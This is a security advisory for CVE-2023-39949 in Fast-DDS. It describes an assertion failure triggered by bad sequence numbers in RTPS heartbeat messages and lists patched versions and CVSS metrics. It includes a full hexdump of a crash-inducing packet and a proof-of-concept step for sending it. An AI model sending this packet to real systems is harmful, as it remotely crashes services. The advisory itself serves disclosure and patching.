Skip to content

Improper validation of sequence numbers leading to remotely reachable assertion failure

High
MiguelCompany published GHSA-3jv9-j9x3-95cg Aug 11, 2023

Package

Fast-DDS

Affected versions

< 2.9.1

Patched versions

2.9.1 / 2.6.5

Description

Summary

This was reported as #3236.
Opening an advisory for CVE assignment as per the request of Miguel.

Details

Hexdump of a (semantically) malformed RTPS heartbeat message:

0000  45 00 00 68 00 01 40 00 40 11 D9 76 80 3D F0 CF  E..h..@.@..v.=..
0010  EF FF 00 01 05 39 1C E8 00 54 08 B9 52 54 50 53  .....9...T..RTPS
0020  02 04 01 0F 01 03 02 42 AC 11 00 02 45 E5 E2 FD  .......B....E...
0030  07 BF 34 00 00 00 10 00 00 00 00 00 00 01 00 C2  ..4.............
0040  00 00 00 00 A7 9B EA 8C BE ED DC CB 00 03 00 00  ................
0050  77 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00  w...............
0060  00 00 00 00 00 00 00 00                          ........

This heartbeat submessage has bad sequence numbers, i.e.,

firstSN.high = 0xc2000100 // -1040187136
firstSN.low = 0x00

lastSN.high = 0x8cea9ba7
lastSN.low = 0xcbdcedbe

The sanity check line at MessageReceiver.cpp:1057, invokes the - operator (firstSN - 1):

inline SequenceNumber_t operator -(
        const SequenceNumber_t& seq,
        const uint32_t inc) noexcept
{
    SequenceNumber_t res(seq.high, seq.low - inc);

    if (inc > seq.low)
    {
        // Being the type of the parameter an 'uint32_t', the decrement of 'high' will be as much as 1.
        assert(0 < res.high);
        --res.high;
    }

    return res;
}

in which inc (== 1) > seq.low (== 0) is false and the assert() inside is triggered as 0 < res.high (== -1040187136) is false.

PoC

Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.

Impact

This can remotely crash any Fast-DDS process.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2023-39949

Weaknesses

Credits